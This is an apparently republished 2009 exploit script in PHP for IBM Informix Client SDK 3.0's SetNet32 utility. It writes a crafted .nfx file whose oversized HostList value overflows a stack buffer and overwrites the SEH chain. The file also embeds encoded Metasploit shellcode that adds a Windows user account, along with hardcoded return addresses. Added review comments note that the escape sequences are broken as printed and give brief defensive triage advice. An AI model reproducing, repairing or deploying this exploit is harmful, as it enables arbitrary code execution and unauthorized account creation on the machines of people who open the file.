
# Title : IBM Informix Client SDK 3.0 nfx file integer overflow exploit
# Published : 2009-10-05
# Author : bruiser


<?php
/* IBM Informix Client SDK 3.0 SetNet32 File (.nfx) Hostsize integer overflow exploit
   (2k3 sp0)
   by Nine:Situations:Group::bruiser
   site: http://retrogod.altervista.org/

   vulnerable packages: IBM Informix Client SDK 3.0,
   IBM Informix Connect Runtime 3.x,
   possibly other products carrying the setnet32 utility.

   User-supplied value for the Hostsize field results in an integer overflow and
   subsequently a complete stack smash by passing an overlong string to the HostList
   one allowing an attacker to execute arbitrary code.
   All modules in memory are compiled with /SAFESEH=on but it's still possible to
   execute arbitrary code by passing a certain trusted handler from kernel32.dll.
   We fall in a more convenient condition with eip overwritten: now ebp register
   points to a portion of our buffer. So this is context-dependent, try against
   another OS.
   Other attacks are possible through the ProtoSize or ServerSize fields.
   It works by double clicking on the resulting .nfx file.

*/

/* NOTE(review): reading guide for this listing.
   - As printed on this page the PHP string escapes have lost their backslashes
     (e.g. "x90", "rn", "xe9x01..."), so each "xNN" is three literal ASCII
     characters rather than one byte. The byte layout the inline comments below
     describe is therefore not what this text, as shown, would emit.
   - The weakness the header describes is trust in a size field: the [Size]
     section declares HostSize=1517, while the HostList value is assembled from
     312 + 1115 + 29 + 4*64 units (1712 if every escape were a single byte),
     i.e. longer than the declared size. A robust parser must bound the copy by
     the buffer it actually allocated, check the size-field arithmetic for
     overflow, and reject list entries longer than the declared size.
   - Defensive guidance: treat .nfx files as untrusted input (the author notes
     they are opened by double-click), prefer a patched Client SDK release where
     one is available, and a simple triage signal for this class of file is a
     list entry whose length exceeds its declared *Size field.
*/

# windows/adduser - 436 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, USER=sun, PASS=tzu
# $_scode: the payload described by the four lines above; this script treats it
# purely as an opaque byte string whose length is measured with strlen() below.
$_scode=
"x89xe1xd9xc2xd9x71xf4x5bx53x59x49x49x49x49" .
"x49x49x49x49x49x49x43x43x43x43x43x43x37x51" .
"x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32" .
"x41x42x32x42x42x30x42x42x41x42x58x50x38x41" .
"x42x75x4ax49x4bx4cx4ax48x50x44x43x30x45x50" .
"x43x30x4cx4bx50x45x47x4cx4cx4bx43x4cx45x55" .
"x43x48x43x31x4ax4fx4cx4bx50x4fx45x48x4cx4b" .
"x51x4fx47x50x45x51x4ax4bx47x39x4cx4bx46x54" .
"x4cx4bx43x31x4ax4ex50x31x49x50x4cx59x4ex4c" .
"x4dx54x49x50x44x34x44x47x49x51x49x5ax44x4d" .
"x45x51x48x42x4ax4bx4bx44x47x4bx51x44x47x54" .
"x44x44x44x35x4bx55x4cx4bx51x4fx47x54x45x51" .
"x4ax4bx42x46x4cx4bx44x4cx50x4bx4cx4bx51x4f" .
"x45x4cx43x31x4ax4bx4cx4bx45x4cx4cx4bx45x51" .
"x4ax4bx4cx49x51x4cx47x54x45x54x48x43x51x4f" .
"x46x51x4cx36x43x50x46x36x42x44x4cx4bx51x56" .
"x50x30x4cx4bx47x30x44x4cx4cx4bx44x30x45x4c" .
"x4ex4dx4cx4bx45x38x44x48x4bx39x4ax58x4cx43" .
"x49x50x43x5ax50x50x43x58x4cx30x4dx5ax45x54" .
"x51x4fx45x38x4dx48x4bx4ex4dx5ax44x4ex51x47" .
"x4bx4fx4dx37x45x33x42x4dx45x34x46x4ex45x35" .
"x44x38x43x55x51x30x46x4fx45x33x47x50x42x4e" .
"x42x45x43x44x47x50x44x35x42x53x43x55x42x52" .
"x47x50x43x43x43x45x42x4ex51x30x43x44x43x4a" .
"x43x45x51x30x46x4fx51x51x47x34x47x34x51x30" .
"x46x46x47x56x47x50x42x4ex45x35x43x44x51x30" .
"x42x4cx42x4fx43x53x43x51x42x4cx42x47x42x52" .
"x42x4fx42x55x42x50x51x30x51x51x45x34x42x4d" .
"x43x59x42x4ex45x39x43x43x42x54x43x42x43x51" .
"x43x44x42x4fx44x32x42x53x47x50x42x53x44x35" .
"x42x4ex47x50x46x4fx47x31x50x44x47x34x45x50" .
"x41x41";

# $____boom: the complete text of the .nfx file, concatenated section by section
# in the ini-like layout SetNet32 reads: [Setnet32], [ENVIRONMENT], [Size],
# [Lists], then one [__infx_sqlhost_*] / [__infx_host_*] block per entry.
# Everything except the HostList value is ordinary-looking configuration.
$____boom =
"[Setnet32]rn".
"Format=x203.00x203.00.TC1x20x20rn".
"[ENVIRONMENT]rn".
"CC8BITLEVEL=rn".
"CLIENT_LOCALE=EN_US.8859-1rn".
"COLLCHAR=rn".
"CONRETRY=rn".
"CONTIME=rn".
"DB2CLI=rn".
"DBANSIWARN=rn".
"DBDATE=rn".
"DBLANG=EN_US.CP1252rn".
"DBMONEY=rn".
"DBNLS=rn".
"DBPATH=rn".
"DBTEMP=rn".
"DBTIME=rn".
"DELIMIDENT=nrn".
"ESQLMF=rn".
"FET_BUF_SIZE=rn".
"BIG_FET_BUF_SIZE=rn".
"IFX_MULTIPREPSTMT=rn".
"GL_DATE=rn".
"GL_DATETIME=rn".
"IFX_EXTDIRECTIVES=rn".
"IFX_XASTDCOMPLIANCE_XAEND=rn".
"IFX_DIRTY_WAIT=rn".
"INFORMIXDIR=C:Programx20FilesIBMInformixConnect\rn".
"INFORMIXSERVER=aaaaaaaaaaaarn".
"INFORMIXSQLHOSTS=rn".
"LANG=rn".
"LC_COLLATE=rn".
"LC_CTYPE=rn".
"LC_MONETARY=rn".
"LC_NUMERIC=rn".
"LC_TIME=rn".
"DBALSBC=rn".
"DBAPICODE=rn".
"DBASCIIBC=rn".
"DBCENTURY=rn".
"DBCODESET=rn".
"DBCONNECT=rn".
"DBCSCONV=rn".
"DBCSOVERRIDE=rn".
"DBCSWIDTH=rn".
"DBFLTMSK=rn".
"DBMONEYSCALE=rn".
"DBSS2=rn".
"DBSS3=rn".
"IFX_AUTOFREE=rn".
"IFX_DEFERRED_PREPARE=rn".
"NODEFDAC=rn".
"OPTMSG=rn".
"OPTOFC=rn".
"IFX_USE_PREC_16=rn".
"IFX_PAD_VARCHAR=rn".
"NOZEROMDY=rn".
"BLANK_STRINGS_NOT_NULL=rn".
"IFX_FLAT_UCSQ=rn".
"[Size]rn".
"CLIENT_LOCALE=12rn".
"DB_LOCALE=0rn".
"NumOfHosts=999rn".
"NumOfServers=1rn".
"NumOfProtocols=9rn".
"ServerSize=16rn".

// HostSize is the file-supplied size field the header says the parser trusts;
// the HostList value built below is deliberately longer than this declared size.
"HostSize=1517rn".                                //boom!!

"ProtoSize=16rn".
"[Lists]rn".
"INFORMIXSERVERLIST=aaaa;rn".
"HostList=".

// 312 repetitions of the "x90" token ahead of the payload.
str_repeat("x90",312).

$_scode.

// Padded so that payload + padding is always 1115 units long: the positions of
// the fixed values that follow do not move when the payload length changes.
str_repeat("x90",1115 - strlen($_scode)).

// The values below are build/OS-specific constants (the header names 2k3 sp0);
// they are data copied into the file, not computed by this script.
"xe9x01xfbxffxff".                             //jmp back to shellcode
"x90x90x90x90".                                 //junk, this is overwritten in some way
"x87x35xe4x77".                                 //pointer to the next SEH record
"x87x35xe4x77".                                 //SE handler, a registered one from kernel32.dll
"xC0xF0x03xF1".                                 //do not touch
"x41x41x41x41".                                 //do not touch
"x9bx71xd8x77".                                 //call ebp, user32.dll and further jno short
str_repeat("x9bx71xd8x77",64).                  //do not touch
";rn".
"PROTOCOLLIST=olsoctcp;onsoctcp;olsocspx;onsocspx;sesoctcp;sesocspx;seipcpip;olipcnmp;onipcnmp;rn".
"[__infx_sqlhost_aaaaaaaaaaaaaaa]rn".
"HOST=rn".
"SERVICE=1527rn".
"PROTOCOL=olsoctcprn".
"OPTIONS=rn".
"[__infx_host_192.168.0.1]rn".
"USER=informixrn".
"PASS=EPx20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200x20".
"x200x20x200x20x200x20x200x20x200rn".
"AskPassword=Prn".
"[__infx_host_192.168.0.2]rn".
"USER=aaaarn".
"PASS=EPx20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200x2049x20x200x20x200x20x20".
"0x20x200x20x200x20x200x20x200x20x200x20x200rn".
"AskPassword=Prn".
"[__infx_host_192.168.0.3]rn".
"USER=informixrn".
"PASS=EPx20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x20".
"0x20x200x20x200x20x200x20x200x20x200x20x200x20x200x20x200rn".
"AskPassword=Prn".
"x00";

// Writes the assembled text to 9sg.nfx in the current working directory.
// The return value (false on failure, e.g. an unwritable directory) is not checked.
file_put_contents("9sg.nfx",$____boom);
?>